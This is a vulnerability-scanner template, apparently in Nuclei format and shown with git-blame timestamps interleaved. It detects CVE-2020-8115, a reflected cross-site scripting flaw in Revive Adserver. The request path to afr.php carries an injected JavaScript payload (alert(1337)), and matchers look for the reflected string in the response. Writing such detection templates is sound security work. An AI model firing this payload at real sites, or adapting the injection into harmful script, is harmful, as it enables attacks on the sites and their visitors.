2020-04-08 11:27:13 +00:00
|
|
|
id: CVE-2020-8115
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Revive Adserver XSS
|
|
|
|
author: madrobot
|
2020-05-25 07:49:06 +00:00
|
|
|
severity: medium
|
2020-04-08 11:27:13 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-04-09 13:02:30 +00:00
|
|
|
- "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
|
2020-04-08 11:27:13 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
2020-05-25 07:49:06 +00:00
|
|
|
- 200
|
2020-04-08 13:21:47 +00:00
|
|
|
- type: word
|
2020-04-08 13:25:45 +00:00
|
|
|
words:
|
2020-05-25 07:49:06 +00:00
|
|
|
- "alert(1337)"
|
2020-04-08 11:27:13 +00:00
|
|
|
part: body
|